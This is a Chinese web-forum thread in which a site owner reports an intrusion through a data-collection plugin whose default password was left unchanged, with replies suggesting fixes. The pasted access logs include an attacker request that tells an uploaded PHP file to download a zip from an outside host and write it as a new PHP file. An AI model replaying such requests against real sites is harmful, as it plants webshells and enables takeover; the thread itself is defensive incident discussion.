·设为首页收藏本站📧邮箱修改🎁免费下载专区📒收藏夹📱AI全功能
🔄最新发布📃文档资料库🆔加群看共享软件分享切换到窄版
立即注册
DZ插件网»🏠首页 Discuz! 站长圈子 网站被黑了,怎么办?
12下一页
返回列表 发布新帖

网站被黑了,怎么办?

155 17
发表于 2025-8-12 13:05:35 | 查看全部 阅读模式

马上注册,免费下载更多dz插件网资源。

您需要 登录 才可以下载或查看,没有账号?立即注册

×
今天发现网站别人发布了一篇文章标题为:1的记录这肯定不是我发的,看了宝塔防篡改的,有一条拦截记录/www/wwwroot/www.xxxxx.com/zb_users/upload/ad10523.icu/ccsl.php
还好被拦截成功了,没有创建成功这个php文件,随后网站日志显示:
  1. 103.233.8.96 - - [11/Aug/2025:16:19:29 +0800] "POST /zb_users/plugin/keydatas/keydatas_zblog.php?__kds_flag=post HTTP/2.0" 200 101 "https://www.waimaopeixun.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"
复制代码
一直访问了我简数采集插件的链接并且带有他几个外链,还有他创建的那个文件,幸好是被防篡改拦截掉了
  1. 103.233.8.96 - - [11/Aug/2025:16:19:47 +0800] "GET /zb_users/upload/ad10523.icu HTTP/2.0" 404 1003 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"103.233.8.96 - - [11/Aug/2025:16:19:45 +0800] "GET /zb_users/upload/ad10523.icu/ccsl.php HTTP/2.0" 404 1003 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"103.233.8.96 - - [11/Aug/2025:16:19:43 +0800] "GET /zb_users/upload/ad10523.icu/ccsl.php HTTP/2.0" 404 1003 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"103.233.8.96 - - [11/Aug/2025:16:19:37 +0800] "GET /zb_users/upload/ad10523.icu/ccsl.php?&1=http://www.r165.com/aoye/1.zip&2=../../Zml.php HTTP/2.0" 403 708 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"103.233.8.96 - - [11/Aug/2025:16:19:29 +0800] "GET /favicon.ico HTTP/2.0" 200 1919 "/zb_users/plugin/keydatas/keydatas_zblog.php?__kds_flag=post" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
复制代码
求大神帮我分析,是不是把简数插件卸载,就没有问题呢?
网站被黑了, 怎么办解决
我要说一句 收起回复
赞赏
回复

使用道具 举报

评论17

CrystαlLv.8 发表于 2025-8-12 13:06:29 | 查看全部
先要确定你的主机现在是否安全。
再说程序的问题。。
我要说一句 收起回复
回复 支持 反对

使用道具 举报

婷姐Lv.8 发表于 2025-8-12 13:06:41 | 查看全部
网站被黑了,怎么办? 网站被黑了,怎么办解决
也有被防火墙拦截及防篡改拦截,应该是安全的吧?
我要说一句 收起回复
回复 支持 反对

使用道具 举报

CrystαlLv.8 发表于 2025-8-12 13:07:39 | 查看全部
简数这个插件密码我设置的是默认密码,应该是被扫到了
我要说一句 收起回复
回复 支持 反对

使用道具 举报

CrystαlLv.8 发表于 2025-8-12 13:08:22 | 查看全部
你的意思是简数偷偷搞小动作?
我要说一句 收起回复
回复 支持 反对

使用道具 举报

IT618发布Lv.8 发表于 2025-8-12 13:09:10 | 查看全部
可能是别人扫描到了默认密码的站点
我要说一句 收起回复
回复 支持 反对

使用道具 举报

拾光Lv.8 发表于 2025-8-12 13:09:32 | 查看全部
改密码再看
我要说一句 收起回复
回复 支持 反对

使用道具 举报

IT618发布Lv.8 发表于 2025-8-12 13:10:21 | 查看全部
被扫正常
我要说一句 收起回复
回复 支持 反对

使用道具 举报

拾光Lv.8 发表于 2025-8-12 13:11:10 | 查看全部
重装系统
我要说一句 收起回复
回复 支持 反对

使用道具 举报

IT618发布Lv.8 发表于 2025-8-12 13:11:48 | 查看全部
upload 目录直接去掉执行权限
我要说一句 收起回复
回复 支持 反对

使用道具 举报

下一页 »
12下一页
返回列表 发布新帖

回复
 懒得打字嘛,点击右侧快捷回复【查看最新发布】   【应用商城享更多资源】
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

关闭

站长推荐上一条 /1 下一条

最新热评 加载中...
AI智能体

关于我们

关于我们 免责声明 应用市场 下载中心

服务支持

有问必答 优秀站点 常见问题 建站必看
投诉/建议联系

discuzaddons@vip.qq.com

未经授权禁止转载,复制和建立镜像,
如有违反,按照公告处理!!!
  • 联系QQ客服
  • 添加微信客服

联系DZ插件网微信客服|最近更新|Archiver|手机版|小黑屋|DZ插件网! ( 鄂ICP备20010621号-1 )|网站地图 知道创宇云防御

您的IP:216.73.216.180, 27.155.113.19,GMT+8, 2026-2-5 11:34 , Processed in 1.994163 second(s), 138 queries , Gzip On, Redis On.

Powered by Discuz! X5.1 Licensed

© 2001-2026 Discuz! Team.

关灯 在本版发帖
扫一扫添加微信客服
 QQ客服返回顶部
快速回复 返回顶部 返回列表